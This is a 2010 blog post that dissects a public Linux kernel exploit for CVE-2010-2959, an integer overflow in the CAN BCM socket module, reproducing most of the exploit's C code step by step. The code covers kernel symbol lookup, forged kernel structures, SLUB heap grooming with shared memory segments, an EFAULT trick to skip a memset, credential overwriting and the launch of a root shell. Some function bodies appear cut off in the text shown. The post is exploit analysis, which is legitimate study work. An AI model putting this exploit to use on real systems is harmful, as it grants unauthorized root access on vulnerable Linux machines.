xorl %eax, %eax

CVE-2010-2959: Linux kernel Controller Area Network Integer Overflow

leave a comment »

This vulnerability was reported some time ago by Ben Hawkes, who also wrote a blog post that explains his finding. Since Hawkes has already discussed the vulnerability in his excellent post, I’ll move on and discuss the exploitation process based on Jon Oberheide’s released code “i-can-haz-modharden.c”.
Let’s have a look at Jon Oberheide’s code now…

main(int argc, char **argv)
    return 0;

So, this is how we’ll discuss the functions of his exploit code. First of all, let’s move to setup() and see what’s going on there.

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
_commit_creds commit_creds;
    printf("[+] looking for symbols...\n");
    commit_creds = (_commit_creds) get_symbol("commit_creds");
    if (!commit_creds) {
        printf("[-] symbol table not availabe, aborting!\n");

GCC’s regparm attribute forces the compiler to pass the specified number of arguments (here, up to three) in registers rather than on the stack. Next, inside setup() we see a call to get_symbol(), which is a simple parsing routine that uses either /proc/kallsyms or /proc/ksyms to retrieve the requested symbol’s address like this:

unsigned long
get_symbol(char *name)
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    int ret = 0, oldstyle;
    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            return 0;
        oldstyle = 1;
    while (ret != EOF) {
        if (!oldstyle) {
            ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
        } else {
            ret = fscanf(f, "%p %s\n", (void **) &addr, sname);
            if (ret == 2) {
                char *p;
                if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
                p = strrchr(sname, '_');
                if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_') {
                    *p = '\0';
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
        if (!strcmp(name, sname)) {
            printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
            return addr;
    return 0;

So, the setup() has hopefully retrieved the ‘commit_creds’ address which is a kernel API routine used to install new credentials to the current task. Next, setup() will execute the following code:

typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_prepare_kernel_cred prepare_kernel_cred;
    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
    if (!prepare_kernel_cred) {
        printf("[-] symbol table not availabe, aborting!\n");
    printf("[+] setting up exploit payload...\n");

Similarly, he attempts to retrieve prepare_kernel_cred() address. This kernel function is used to prepare a set of credentials for a kernel service. Continuing with the code we see this:

struct super_block {
    struct list_head s_list;
    unsigned int s_dev;
    unsigned long s_blocksize;
    unsigned char s_blocksize_bits;
    unsigned char s_dirt;
    uint64_t s_maxbytes;
    void *s_type;
    void *s_op;
    void *dq_op;
    void *s_qcop;
    void *s_export_op;
    unsigned long s_flags;
} super_block;
    super_block.s_flags = 0;

The super block’s “flags” member is set to zero and the inode initialization takes place like this:

struct inode {
    struct list_head i_hash;
    struct list_head i_list;
    struct list_head i_sb_list;
    struct list_head i_dentry_list;
    unsigned long i_ino;
    unsigned int i_count;
    unsigned int i_nlink;
    unsigned int i_uid;
    unsigned int i_gid;
    unsigned int i_rdev;
    uint64_t i_version;
    uint64_t i_size;
    unsigned int i_size_seqcount;
    long i_atime_tv_sec;
    long i_atime_tv_nsec;
    long i_mtime_tv_sec;
    long i_mtime_tv_nsec;
    long i_ctime_tv_sec;
    long i_ctime_tv_nsec;
    uint64_t i_blocks;
    unsigned int i_blkbits;
    unsigned short i_bytes;
    unsigned short i_mode;
    unsigned int i_lock;
    struct mutex i_mutex;
    unsigned int i_alloc_sem_activity;
    unsigned int i_alloc_sem_wait_lock;
    struct list_head i_alloc_sem_wait_list;
    void *i_op;
    void *i_fop;
    struct super_block *i_sb;
    void *i_flock;
    void *i_mapping;
    char i_data[84];
    void *i_dquot_1;
    void *i_dquot_2;
    struct list_head i_devices;
    void *i_pipe_union;
    unsigned int i_generation;
    unsigned int i_fsnotify_mask;
    void *i_fsnotify_mark_entries;
    struct list_head inotify_watches;
    struct mutex inotify_mutex;
} inode;
    inode.i_size = 4096;
    inode.i_sb = &super_block;
    inode.inotify_watches.next = &inode.inotify_watches;
    inode.inotify_watches.prev = &inode.inotify_watches;
    inode.inotify_mutex.count = 1;

The inode’s size is set to 4096 which is the page size on 32-bit architectures and inode’s super-block is set to the address of ‘super_block’ structure. Finally, the inotify watches are initialized to point to inode’s watches and MUTEX lock’s counter is set to 1. The next code of setup() is the dentry level initialization code which is the following:

struct list_head {
    struct list_head *next;
    struct list_head *prev;
struct dentry {
    unsigned int d_count;
    unsigned int d_flags;
    unsigned int d_lock;
    int d_mounted;
    void *d_inode;
    struct list_head d_hash;
    void *d_parent;
} dentry;
    dentry.d_count = 4096;
    dentry.d_flags = 4096;
    dentry.d_parent = NULL;
    dentry.d_inode = &inode;

Nothing really notable in the dentry initialization code. Two file operations’ callback functions are initialized next like this:

struct file_operations {
    void *owner;
    void *llseek;
    void *read;
    void *write;
    void *aio_read;
    void *aio_write;
    void *readdir;
    void *poll;
    void *ioctl;
    void *unlocked_ioctl;
    void *compat_ioctl;
    void *mmap;
    void *open;
    void *flush;
    void *release;
    void *fsync;
    void *aio_fsync;
    void *fasync;
    void *lock;
    void *sendpage;
    void *get_unmapped_area;
    void *check_flags;
    void *flock;
    void *splice_write;
    void *splice_read;
    void *setlease;
} op;
    op.mmap = &kernel_code;
    op.get_unmapped_area = &kernel_code;

Both the ‘mmap’ and ‘get_unmapped_area’ file operations, which are used to map kernel memory and retrieve the unmapped area, are set to point to the userland function ‘kernel_code’. The latter routine contains the code below:

int __attribute__((regparm(3)))
kernel_code(struct file *file, void *vma)
    return -1;

Which is straightforward. It will update the credential set to that of 0 using the exported kernel API routines prepare_kernel_cred() and commit_creds(). Back to the setup() code, we now have this:

struct vfsmount {
    struct list_head mnt_hash;
    void *mnt_parent;
    void *mnt_mountpoint;
    void *mnt_root;
    void *mnt_sb;
    struct list_head mnt_mounts;
    struct list_head mnt_child;
    int mnt_flags;
    const char *mnt_devname;
    struct list_head mnt_list;
    struct list_head mnt_expire;
    struct list_head mnt_share;
    struct list_head mnt_slave_list;
    struct list_head mnt_slave;
    struct vfsmount *mnt_master;
    struct mnt_namespace *mnt_ns;
    int mnt_id;
    int mnt_group_id;
    int mnt_count;
} vfsmount;
    vfsmount.mnt_flags = 0;
    vfsmount.mnt_count = 1;

That simply initializes the VFS mount structure’s counter and flags members. The next structure that will be initialized is the ‘file’ which is performed in setup() as you can see here:

struct file {
    struct list_head fu_list;
    struct vfsmount *f_vfsmnt;
    struct dentry *f_dentry;
    void *f_op;
    unsigned int f_lock;
    unsigned long f_count;
} file;
    file.fu_list.prev = &file.fu_list;
    file.fu_list.next = &file.fu_list;
    file.f_dentry = &dentry;
    file.f_vfsmnt = &vfsmount;
    file.f_op = &op;

The previous dentry, VFS mount and file operations structures are used to initialize the ‘file’ structure as shown above. At last, setup() contains the code below:

struct kern_ipc_perm {
    unsigned int lock;
    int deleted;
    int id;
    unsigned int key;
    unsigned int uid;
    unsigned int gid;
    unsigned int cuid;
    unsigned int cgid;
    unsigned int mode;
    unsigned int seq;
    void *security;
struct shmid_kernel {
    struct kern_ipc_perm shm_perm;
    struct file *shm_file;
    unsigned long shm_nattch;
    unsigned long shm_segsz;
    time_t shm_atim;
    time_t shm_dtim;
    time_t shm_ctim;
    unsigned int shm_cprid;
    unsigned int shm_lprid;
    void *mlock_user;
} shmid_kernel;
    shmid_kernel.shm_perm.key = IPC_PRIVATE;
    shmid_kernel.shm_perm.uid = getuid();
    shmid_kernel.shm_perm.gid = getgid();
    shmid_kernel.shm_perm.cuid = getuid();
    shmid_kernel.shm_perm.cgid = getgid();
    shmid_kernel.shm_perm.mode = -1;
    shmid_kernel.shm_file = &file;

This is a shared memory structure that will be used in the kernel heap memory corruption. This was the preparation code and we can now move to the next, trigger() function which is more interesting…

#ifndef PF_CAN
#define PF_CAN 29
#ifndef CAN_BCM
#define CAN_BCM 2
struct sockaddr_can {
    sa_family_t can_family;
    int can_ifindex;
    union {
        struct { uint32_t rx_id, tx_id; } tp;
    } can_addr;

struct can_frame {
    uint32_t can_id;
    uint8_t can_dlc;
    uint8_t data[8] __attribute__((aligned(8)));
struct bcm_msg_head {
    uint32_t opcode;
    uint32_t flags;
    uint32_t count;
    struct timeval ival1, ival2;
    uint32_t can_id;
    uint32_t nframes;
    struct can_frame frames[0];
    int *shmids;
    int i, ret, sock, cnt, base, smashed;
    int diff, active, total, active_new, total_new;
    int len, sock_len, mmap_len;
    struct sockaddr_can addr;
    struct bcm_msg_head *msg;
    void *efault;
    char *buf;
    printf("[+] creating PF_CAN socket...\n");
    sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);
    if (sock < 0) {
        printf("[-] kernel lacks CAN packet family support\n");

Of course, it’ll first attempt to create a ‘PF_CAN’ socket with ‘CAN_BCM’ option since this module provides some desirable properties for kernel heap exploitation as Jon Oberheide states in his comments. If the socket family exists, it will continue like this:

    printf("[+] connecting PF_CAN socket...\n");
    memset(&addr, 0, sizeof(addr));
    addr.can_family = PF_CAN;
    ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
    if (sock < 0) {
        printf("[-] could not connect CAN socket\n");

So, assuming that it connected successfully, it will continue executing trigger()’s code as shown below:

#define ALLOCATION 96
#define CFSIZ sizeof(struct can_frame)
#define MHSIZ sizeof(struct bcm_msg_head)
    len = MHSIZ + (CFSIZ * (ALLOCATION / 16));
    msg = malloc(len);
    memset(msg, 0, len);
    msg->can_id = 2959;
    msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;

It allocates some space using malloc(3), zeroes it out, and sets ‘can_id’ to a value that will make bcm_find_op() return NULL, as Ben Hawkes described, because it won’t find any operation with a matching ID. Here is bcm_find_op()’s code as seen in net/can/bcm.c:

static struct bcm_op *bcm_find_op(struct list_head *ops, canid_t can_id,
                                  int ifindex)
        struct bcm_op *op;

        list_for_each_entry(op, ops, list) {
                if ((op->can_id == can_id) && (op->ifindex == ifindex))
                        return op;

        return NULL;

At last, ‘msg->nframes’ is set to a value that will trigger the integer overflow in bcm_rx_setup()’s kmalloc() call that Hawkes discovered. Here is the actual buggy code:

    if (msg_head->nframes > 1) {
       op->frames = kmalloc(
                      msg_head->nframes * CFSIZ,

So, because of the multiplication with ‘CFSIZ’, the size computation undergoes a controlled integer overflow, and kmalloc() ends up allocating a buffer far smaller than ‘nframes’ frames would require. Back to trigger() we now have this code:

#define RX_SETUP 5
#define RX_DELETE 6
    printf("[+] clearing out any active OPs via RX_DELETE...\n");
    msg->opcode = RX_DELETE;
    ret = send(sock, msg, len, 0);

This will set the message’s opcode to ‘RX_DELETE’ and then using send(2) it clears out any active operations. Now, it’s time for twiz’s shared memory hack…

    printf("[+] removing any active user-owned shmids...\n");
    system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;");

This simple loop will retrieve each SHMID and using ipcrm(1) utility it will remove each one of them as long as it has the appropriate access to them. trigger() continues like this:

#define SLUB "kmalloc-96"
    printf("[+] massaging " SLUB " SLUB cache with dummy allocations\n");
    diff = check_slabinfo(SLUB, &active, &total);

Since it is convenient for the exploitation of this vulnerability, “kmalloc-96” will be smashed. The check_slabinfo() routine is a simple function that parses /proc/slabinfo to retrieve each cache’s name, number of active objects and total number of objects, and returns the difference between the total number of objects and the number of active objects. Here is its code:

check_slabinfo(char *cache, int *active_out, int *total_out)
    FILE *fp;
    char name[64], slab[256];
    int active, total, diff;
    memset(slab, 0, sizeof(slab));
    memset(name, 0, sizeof(name));
    fp = fopen("/proc/slabinfo", "r");
    if (!fp) {
        printf("[-] sorry, /proc/slabinfo is not available!");
    fgets(slab, sizeof(slab) - 1, fp);
    while (1) {
        fgets(slab, sizeof(slab) - 1, fp);
        sscanf(slab, "%s %u %u", name, &active, &total);
        diff = total - active;
        if (strcmp(name, cache) == 0) {
    if (active_out) {
        *active_out = active;
    if (total_out) {
        *total_out = total;
    return diff;

Continuing with twiz’s SHMEM magic, dummy allocations are performed…

    shmids = malloc(sizeof(int) * diff * 10);
    cnt = diff * 10;
    for (i = 0; i < cnt; ++i) {
        diff = check_slabinfo(SLUB, &active, &total);
        if (diff == 0) {
        shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
    base = i;

    if (diff != 0) {
        printf("[-] inconsistency detected with SLUB cache allocation, please try again\n");

Hopefully, this code will find the ideal base number that could be used to perform a controlled heap memory corruption. However, if the right difference (which is 0 for total minus active number of objects) isn’t found, it will return an error and exit. Otherwise, it will continue with trigger()’s code.

#define FILLER 100
    printf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...\n");
    i = base;
    cnt = i + FILLER;
    for (; i < cnt; ++i) {
        shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);

It will allocate shared memory segments with shmget(2), starting from the previously calculated base index value. And it will perform the actual trigger of the bug here:

    msg->opcode = RX_SETUP;
    ret = send(sock, msg, len, 0);
    if (ret < 0) {
        printf("[-] kernel rejected malformed CAN header\n");

This will set the message’s opcode to that of the buggy function and then it’ll attempt to send the malformed CAN header using the send(2) system call. If the overflow occurred, it would have truncated memory after ‘i + FILLER’, so the following code is used to get those segments:

    i = base + FILLER;
    cnt = i + FILLER;
    for (; i < cnt; ++i) {
        shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);

To understand what happens in the following code we need to have a look at bcm_rx_setup()’s code and specifically in the following snippet:

                if (msg_head->nframes > op->nframes)
                        return -E2BIG;

                if (msg_head->nframes) {
                        /* update can_frames content */
                        err = memcpy_fromiovec((u8 *)op->frames,
                                               msg_head->nframes * CFSIZ);
                        if (err < 0)
                                return err;

                        /* clear last_frames to indicate 'nothing received' */
                        memset(op->last_frames, 0, msg_head->nframes * CFSIZ);

The first check is bypassed since ‘op->nframes’ is larger than ‘msg_head->nframes’, but the problem appears inside the second ‘if’ clause. The memcpy_fromiovec() call will result in the actual memory corruption, but in this case, exactly after this call is a memset(3) invocation that zeroes out ‘op->last_frames’, which in this case is almost certainly an overflowed segment of memory, and it also uses the malformed length of ‘msg_head->nframes * CFSIZ’. This will turn the entire SHMID controlled smash to zeroes.
To overcome this, Jon Oberheide did the following (in his own words):

To work around this, we take advantage of the fact that copy_from_user can
perform partial writes on x86 and trigger an EFAULT by setting up a
truncated memory mapping as the source for the memcpy_fromiovec operation,
allowing us to smash the necessary amount of memory and then pop out and
return early before the memset operation occurs.

Back to trigger() we have:

    printf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...\n");
    mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3);
    sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4);
    efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    printf("[+] mmap'ed mapping of length %d at %p\n", mmap_len, efault);

Which maps the previously discussed “truncated” memory segment to later trigger the EFAULT of memcpy_fromiovec() before memset(3) occurs. The exploitation code will then attempt to smash the adjacent memory in order to create a controlled SLUB overflow like this:

    printf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...\n");
    msg = (struct bcm_msg_head *) efault;
    memset(msg, 0, mmap_len);
    msg->can_id = 2959;
    msg->nframes = (ALLOCATION / 16) * 4;
    msg->opcode = RX_SETUP;
    ret = send(sock, msg, mmap_len, 0);
    if (ret != -1 && errno != EFAULT) {
        printf("[-] couldn't trigger EFAULT, exploit aborting!\n");

This is a dummy attempt in order to check if the EFAULT is triggered successfully. Then, it follows a nice scan code.

#define EIDRM 43
    printf("[+] seeking out the smashed shmid_kernel...\n");
    i = base;
    cnt = i + FILLER + FILLER;
    for (; i < cnt; ++i) {
        ret = (int) shmat(shmids[i], NULL, SHM_RDONLY);
        if (ret == -1 && errno == EIDRM) {
            smashed = i;
    if (i == cnt) {
        printf("[-] could not find smashed shmid, trying running the exploit again!\n");
    printf("[+] discovered our smashed shmid_kernel at shmid[%d] = %d\n", i, shmids[i]);

This loop checks each shared memory segment to find the smashed one. To do this it attempts to attach (as read-only) each shared memory segment using the shmat(2) system call. However, if the latter system call returns with an error (aka. return value equals -1) and the “errno” global variable is set to “EIDRM” (Error Identifier Removed), it means that this was the smashed memory. So, it stores that index value in ‘smashed’ and continues with the exploitation.

#define IPCMNI 32768
    printf("[+] re-smashing the shmid_kernel with exploit payload...\n");
    shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI;
    buf = (char *) msg;
    memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel));

It sets ‘shmid_kernel.shm_perm.seq’ to the sequence number of the smashed segment (its shmid divided by IPCMNI) and then copies the structure at the end of the buffer that will be copied to kernel space.

    msg->opcode = RX_SETUP;
    ret = send(sock, msg, mmap_len, 0);
    if (ret != -1 && errno != EFAULT) {
        printf("[-] couldn't trigger EFAULT, exploit aborting!\n");

This is a simple trigger of the vulnerability and then…

    ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);
    if (ret == -1 && errno != EIDRM) {
        setresuid(0, 0, 0);
        setresgid(0, 0, 0);
        printf("[+] launching root shell!\n");
        execl("/bin/bash", "/bin/bash", NULL);
    printf("[-] exploit failed! retry?\n");

It will attempt to access the smashed memory segment, and if the error code isn’t EIDRM, which means that the identifier wasn’t removed, the exploit would probably have succeeded and the file operation mmap() or get_unmapped_area() would have been called, thus giving root access to our task. So, it updates the real, effective and saved user and group IDs to 0 and launches a root shell.

Written by xorl

October 4, 2010 at 15:30

Posted in bugs, linux

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s